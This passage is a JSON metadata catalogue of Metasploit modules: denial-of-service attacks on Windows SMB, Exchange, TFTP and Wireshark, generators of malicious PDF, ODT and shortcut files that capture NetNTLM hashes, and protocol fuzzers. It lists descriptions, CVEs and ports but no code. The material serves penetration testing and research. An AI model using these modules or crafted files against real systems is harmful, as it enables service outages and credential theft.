"auxiliary_dos/windows/smb/ms06_035_mailslot": {
"name": "Microsoft SRV.SYS Mailslot Write Corruption",
"full_name": "auxiliary/dos/windows/smb/ms06_035_mailslot",
"rank": 300,
"disclosure_date": "2006-07-11",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).",
"references": [
"BID-19215",
"OSVDB-27644",
"CVE-2006-3942",
"URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10",
"MSB-MS06-035"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms06_035_mailslot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms06_063_trans": {
"name": "Microsoft SRV.SYS Pipe Transaction No Null",
"full_name": "auxiliary/dos/windows/smb/ms06_063_trans",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. This bug was\n independently discovered by CORE Security and ISS.",
"references": [
"OSVDB-27644",
"MSB-MS06-063",
"CVE-2006-3942",
"BID-19215"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms06_063_trans",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms09_001_write": {
"name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset",
"full_name": "auxiliary/dos/windows/smb/ms09_001_write",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"j.v.vallejo <j.v.vallejo@gmail.com>"
],
"description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.",
"references": [
"MSB-MS09-001",
"OSVDB-48153",
"CVE-2008-4114",
"BID-31179"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_001_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": {
"name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",
"full_name": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.",
"references": [
"CVE-2009-3103",
"BID-36299",
"OSVDB-57799",
"MSB-MS09-050",
"URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html",
"URL-http://www.microsoft.com/technet/security/advisory/975497.mspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": {
"name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference",
"full_name": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.",
"references": [
"CVE-2009-3103",
"OSVDB-57799",
"MSB-MS09-050"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": {
"name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop",
"full_name": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.",
"references": [
"CVE-2010-0017",
"OSVDB-62244",
"MSB-MS10-006",
"URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": {
"name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS",
"full_name": "auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.",
"references": [
"CVE-2010-2550",
"OSVDB-66974",
"MSB-MS10-054",
"URL-https://seclists.org/fulldisclosure/2010/Aug/122"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms11_019_electbowser": {
"name": "Microsoft Windows Browser Pool DoS",
"full_name": "auxiliary/dos/windows/smb/ms11_019_electbowser",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Cupidon-3005",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.",
"references": [
"CVE-2011-0654",
"BID-46360",
"OSVDB-70881",
"MSB-MS11-019",
"EDB-16166",
"URL-https://seclists.org/fulldisclosure/2011/Feb/285"
],
"platform": "",
"arch": "",
"rport": 138,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms11_019_electbowser",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/rras_vls_null_deref": {
"name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference",
"full_name": "auxiliary/dos/windows/smb/rras_vls_null_deref",
"rank": 300,
"disclosure_date": "2006-06-14",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).",
"references": [
"OSVDB-64340"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/rras_vls_null_deref",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/vista_negotiate_stop": {
"name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS",
"full_name": "auxiliary/dos/windows/smb/vista_negotiate_stop",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.",
"references": [
"OSVDB-64341"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/vista_negotiate_stop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smtp/ms06_019_exchange": {
"name": "MS06-019 Exchange MODPROP Heap Overflow",
"full_name": "auxiliary/dos/windows/smtp/ms06_019_exchange",
"rank": 300,
"disclosure_date": "2004-11-12",
"type": "auxiliary",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.",
"references": [
"BID-17908",
"CVE-2006-0027",
"MSB-MS06-019"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/smtp/ms06_019_exchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ssh/sysax_sshd_kexchange": {
"name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service",
"full_name": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange",
"rank": 300,
"disclosure_date": "2013-03-17",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.",
"references": [
"OSVDB-92081",
"URL-http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/ssh/sysax_sshd_kexchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/tftp/pt360_write": {
"name": "PacketTrap TFTP Server 2.2.5459.0 DoS",
"full_name": "auxiliary/dos/windows/tftp/pt360_write",
"rank": 300,
"disclosure_date": "2008-10-29",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.",
"references": [
"CVE-2008-1311",
"OSVDB-42932",
"EDB-6863"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb",
"is_install_path": true,
"ref_name": "dos/windows/tftp/pt360_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/tftp/solarwinds": {
"name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service",
"full_name": "auxiliary/dos/windows/tftp/solarwinds",
"rank": 300,
"disclosure_date": "2010-05-21",
"type": "auxiliary",
"author": [
"Nullthreat"
],
"description": "The SolarWinds TFTP server can be shut down by sending a 'netascii' read\n request with a specially crafted file name.",
"references": [
"CVE-2010-2115",
"OSVDB-64845",
"EDB-12683"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb",
"is_install_path": true,
"ref_name": "dos/windows/tftp/solarwinds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/capwap": {
"name": "Wireshark CAPWAP Dissector DoS",
"full_name": "auxiliary/dos/wireshark/capwap",
"rank": 300,
"disclosure_date": "2014-04-28",
"type": "auxiliary",
"author": [
"Laurent Butti",
"j0sm1"
],
"description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.",
"references": [
"CVE-2013-4074",
"OSVDB-94091",
"BID-60500"
],
"platform": "",
"arch": "",
"rport": 5247,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/capwap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/capwap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/chunked": {
"name": "Wireshark chunked_encoding_dissector Function DOS",
"full_name": "auxiliary/dos/wireshark/chunked",
"rank": 300,
"disclosure_date": "2007-02-22",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)",
"references": [
"CVE-2007-3389",
"OSVDB-37643",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/chunked.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/chunked",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/cldap": {
"name": "Wireshark CLDAP Dissector DOS",
"full_name": "auxiliary/dos/wireshark/cldap",
"rank": 300,
"disclosure_date": "2011-03-01",
"type": "auxiliary",
"author": [
"joernchen <joernchen <joernchen <joernchen@phenoelit.de> (Phenoelit)>"
],
"description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially crafted UDP packet.",
"references": [
"CVE-2011-1140",
"OSVDB-71552",
"URL-http://www.wireshark.org/security/wnpa-sec-2011-04.html",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717"
],
"platform": "",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/cldap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/cldap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/ldap": {
"name": "Wireshark LDAP Dissector DOS",
"full_name": "auxiliary/dos/wireshark/ldap",
"rank": 300,
"disclosure_date": "2008-03-28",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.",
"references": [
"CVE-2008-1562",
"OSVDB-43840"
],
"platform": "",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/ldap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/ldap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fileformat/badpdf": {
"name": "BADPDF Malicious PDF Creator",
"full_name": "auxiliary/fileformat/badpdf",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Assaf Baharav",
"Yaron Fruchtmann",
"Ido Solomon",
"Richard Davy - secureyourit.co.uk"
],
"description": "This module can either creates a blank PDF file which contains a UNC link which can be used\n to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary\n code into an existing PDF document if possible.",
"references": [
"CVE-2018-4993",
"URL-https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-09 14:30:24 +0000",
"path": "/modules/auxiliary/fileformat/badpdf.rb",
"is_install_path": true,
"ref_name": "fileformat/badpdf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fileformat/multidrop": {
"name": "Windows SMB Multi Dropper",
"full_name": "auxiliary/fileformat/multidrop",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Richard Davy - secureyourit.co.uk",
"Lnk Creation Code by Mubix",
"asoto-r7"
],
"description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n to the the specified remote host, causing SMB connections to be initiated\n from any user that views the file.",
"references": [
"URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018",
"URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/",
"URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-05 11:51:48 +0000",
"path": "/modules/auxiliary/fileformat/multidrop.rb",
"is_install_path": true,
"ref_name": "fileformat/multidrop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fileformat/odt_badodt": {
"name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator",
"full_name": "auxiliary/fileformat/odt_badodt",
"rank": 300,
"disclosure_date": "2018-05-01",
"type": "auxiliary",
"author": [
"Richard Davy - secureyourit.co.uk"
],
"description": "Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.",
"references": [
"CVE-2018-10583",
"URL-https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-06-06 11:26:20 +0000",
"path": "/modules/auxiliary/fileformat/odt_badodt.rb",
"is_install_path": true,
"ref_name": "fileformat/odt_badodt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/dns/dns_fuzzer": {
"name": "DNS and DNSSEC Fuzzer",
"full_name": "auxiliary/fuzzers/dns/dns_fuzzer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>"
],
"description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. Note that this module may inadvertently\n crash the target server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/dns/dns_fuzzer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ftp/client_ftp": {
"name": "Simple FTP Client Fuzzer",
"full_name": "auxiliary/fuzzers/ftp/client_ftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module will serve an FTP server and perform FTP client interaction fuzzing",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb",
"is_install_path": true,
"ref_name": "fuzzers/ftp/client_ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ftp/ftp_pre_post": {
"name": "Simple FTP Fuzzer",
"full_name": "auxiliary/fuzzers/ftp/ftp_pre_post",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "This module will connect to a FTP server and perform pre- and post-authentication fuzzing",
"references": [
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
"is_install_path": true,
"ref_name": "fuzzers/ftp/ftp_pre_post",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/http/http_form_field": {
"name": "HTTP Form Field Fuzzer",
"full_name": "auxiliary/fuzzers/http/http_form_field",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"corelanc0d3r",
"Paulino Calderon <calderon@websec.mx>"
],
"description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_form_field.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_form_field",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/http/http_get_uri_long": {
"name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)",
"full_name": "auxiliary/fuzzers/http/http_get_uri_long",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullthreat"
],
"description": "This module sends a series of HTTP GET request with incrementing URL lengths.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_get_uri_long",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/http/http_get_uri_strings": {
"name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)",
"full_name": "auxiliary/fuzzers/http/http_get_uri_strings",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullthreat"
],
"description": "This module sends a series of HTTP GET request with malicious URIs.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_get_uri_strings",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": {
"name": "NTP Protocol Fuzzer",
"full_name": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n This findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs",
"references": [
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-12 09:54:09 +0000",
"path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb2_negotiate_corrupt": {
"name": "SMB Negotiate SMB2 Dialect Corruption",
"full_name": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb2_negotiate_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_create_pipe": {
"name": "SMB Create Pipe Request Fuzzer",
"full_name": "auxiliary/fuzzers/smb/smb_create_pipe",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB create pipe\n requests using malicious strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_create_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_create_pipe_corrupt": {
"name": "SMB Create Pipe Request Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB create pipe requests with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_create_pipe_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_negotiate_corrupt": {
"name": "SMB Negotiate Dialect Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_negotiate_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
